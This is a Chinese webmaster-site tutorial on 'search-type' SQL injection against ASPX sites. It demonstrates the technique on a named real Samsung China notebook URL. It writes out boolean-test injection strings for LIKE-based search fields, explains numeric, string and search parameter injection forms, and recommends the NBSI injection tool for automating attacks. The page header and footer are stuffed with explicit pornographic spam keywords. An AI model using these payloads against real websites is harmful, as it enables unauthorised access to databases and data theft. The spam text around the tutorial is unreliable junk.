青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 安全教程 查看內(nèi)容

ASPX搜索型注入

2022-9-24 10:23| 查看: 2410 |來源: 互聯(lián)網(wǎng)

今天看到有個(gè)關(guān)于搜索型注入的文章,用到的是一種新技術(shù),探測的是三星:http://notebook.samsung.com.cn/index.aspx 注入方式是: 一般網(wǎng)站的搜索都是 ...

今天看到有個(gè)關(guān)于搜索型注入的文章,用到的是一種新技術(shù),探測的是三星:http://notebook.samsung.com.cn/index.aspx

注入方式是:

一般網(wǎng)站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx& ... t&ST=title&SC=
構(gòu)造注入語句 三星%’and 1=1 and ’%’=’  
             三星%’and 1=2 and ’%’=’

大家看到了吧 兩個(gè)返回頁面是不一樣的 說明有注入的漏洞 特征字 寫 筆記本 就是三星%’and 1=1 and ’%’=’ 返回時(shí)有的


我們知道一般搜索代碼是這么寫的:

Select * from 表名 where 字段 like ’%關(guān)鍵字%’

這樣就造成了對關(guān)鍵字前后的所有匹配(%是用來全部匹配的)

這里如果關(guān)鍵字沒有過濾的話,就可以這樣來構(gòu)造:

關(guān)鍵字=’ and [查詢條件] and ‘%’=’

這樣查詢就變成

select * from 表名 where 字段 like ’%’ and 1=1 and ’%’=’%’

這樣就很好的構(gòu)成了一個(gè)sql注入點(diǎn),當(dāng)然用手工也可以,用nbsi也可以~~

注入是不分家的,沒必要什么型什么型的!~

如果不信,大家請看下面的《sql注入天書》的原話

第一節(jié)、SQL注入的一般步驟

首先,判斷環(huán)境,尋找注入點(diǎn),判斷數(shù)據(jù)庫類型,這在入門篇已經(jīng)講過了。

其次,根據(jù)注入?yún)?shù)類型,在腦海中重構(gòu)SQL語句的原貌,按參數(shù)類型主要分為下面三種:

(A)   ID=49 這類注入的參數(shù)是數(shù)字型,SQL語句原貌大致如下:
Select * from 表名 where 字段=49
注入的參數(shù)為ID=49 And [查詢條件],即是生成語句:
Select * from 表名 where 字段=49 And [查詢條件]


(B) Class=連續(xù)劇 這類注入的參數(shù)是字符型,SQL語句原貌大致概如下:
Select * from 表名 where 字段=’連續(xù)劇’  
注入的參數(shù)為Class=連續(xù)劇’ and [查詢條件] and ‘’=’ ,即是生成語句:
Select * from 表名 where 字段=’連續(xù)劇’ and [查詢條件] and ‘’=’’

(C) 搜索時(shí)沒過濾參數(shù)的,如keyword=關(guān)鍵字,SQL語句原貌大致如下:
Select * from 表名 where 字段like ’%關(guān)鍵字%’  
注入的參數(shù)為keyword=’ and [查詢條件] and ‘%’=’, 即是生成語句:
Select * from 表名 where字段like ’%’ and [查詢條件] and ‘%’=’%’


當(dāng)然手工是麻煩的

用工具的話,我建議用nbsi的工具比較好,就我感覺只有nbsi結(jié)合了這個(gè)技術(shù),用別的軟體是不能注入的

注入點(diǎn)只要寫:

http://notebook.samsung.com.cn/news/news.aspx?& ... &ST=title&SC=%

再加個(gè)特征字符就可以了

tag標(biāo)簽:ASPX 搜索型 注入
本文最后更新于 2022-9-24 10:23,某些文章具有時(shí)效性,若有錯(cuò)誤或已失效,請?jiān)诰W(wǎng)站留言或聯(lián)系站長:17tui@17tui.com
·END·
站長網(wǎng)微信號:w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時(shí)修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 久久亚洲这里只有精品18 | 浴室里强摁做开腿呻吟的漫画男男 | WWW国产色情在线观看APP | 国产69精品久久久久APP下载 | 极品美女穴 | 网友自拍偷拍 | 学校捏奶揉下面污文h | 国产午夜精品理论片久久影视 | 我和妽妽在厨房里的激情区二区 | 国产精品免费视频能看 | 欧美精品一区二区三区四区 | 国产精品美女久久久网站动漫 | 第一怡春院 | 97免费视频观看 | 亚洲 欧美 国产 综合 播放 | 久久这里的只有是精品23 | 亚洲精品偷拍影视在线观看 | 国产午夜亚洲精品理论片八戒 | 不卡人妻无码AV中文系列APP | 日本理论片午午伦夜理片2021 | 好大好爽好深舒服死了 | 久久99re2在线视频精品 | 视频成人永久免费视频 | 看全色黄大色大片免费久黄久 | 丰满老熟好大bbbxxx | 日韩一区二区三区视频在线观看 | 色噜噜噜噜亚洲第一 | 久久re亚洲在线视频 | 女教师公车痴汉在线播放 | 亚洲黄色网页 | 伊人久久大香线蕉综合影 | 久久精品午夜一区二区福利 | 无遮挡午夜男女XX00动态 | 久久性色AV亚洲电影无码 | 亚洲视频不卡 | 日韩吃奶摸下AA片免费观看 | 啪啪漫画无遮挡全彩h同人 啪啪激情婷婷久久婷婷色五月 | 国产亚洲精品久久久久5区 国产亚洲精品久久久久 | 黑色丝袜美腿美女被躁翻了 | 亚洲精品日韩在线观看视频 | 亚洲人日本人jlzzy |